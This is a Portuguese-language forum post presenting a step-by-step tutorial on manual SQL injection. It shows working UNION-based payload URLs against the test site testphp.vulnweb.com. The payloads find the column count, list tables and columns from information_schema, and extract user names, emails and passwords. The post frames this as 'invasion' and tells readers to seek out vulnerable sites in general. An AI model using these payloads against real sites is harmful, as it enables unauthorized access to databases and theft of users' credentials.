Como está realizando invasão SQL manualmente (SQL Injection Manual)

[Dark Army 257]

1. Procure um site com vulnerabilidade SQL, já fiz um post de como está achando.
Coloque um ' no final da URL do site, caso apareça algum erro, é vulnerável :)
Exemplo:

 

2. Agora no final da URL, retire o ' e coloque order by 1 
Se o site carregar normalmente sem erro, coloque order by 1,2
E assim por diante, até aparecer o erro novamente.
No caso, o erro apareceu em order by 1,2,3,4. Então o site possui somente 3 colunas.

 

3. Agora vamos unir as colunas, apague tudo da URL, e coloque: union all select *números de colunas*, exemplo: union all select 1,2,3-- e coloque - depois do =, exemplo:
http://testphp.vulnweb.com/artists.php?artist=-1 union all select 1,2,3--

 

Agora vamos listar as tabelas:
http://testphp.vulnweb.com/artists.php?artist=-1 union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema =database()--

 

E pronto, já apareceu as tabelas, que no caso são:
artists,carts,categ,featured,guestbook,pictures,products,users

 

4. Gostaria de saber as informações da tabela "users" somente, então vamos realizar esse comando:
union all select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--

 

Exemplo: http://testphp.vulnweb.com/artists.php?artist=-1 union all select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--

 

Resultado: uname,pass,cc,address,email,name,phone,cart

 

5. Vamos pegar finalmente, as informações, com o seguinte comando:
union all select 1,concat(email,0x3a,pass),3 from users--

 

*OBS: O 0x3a, é :, que vai separar o email:pass.*

 

Exemplo: http://testphp.vulnweb.com/artists.php?artist=-1 union all select 1,concat(uname,0x3a,email,0x3a,pass),3 from users--

 

Resultado: test:[email protected]:test

 

E pronto, foi realizada a invasão manualmente.

Editado 14 de Janeiro 2020 por Dark Army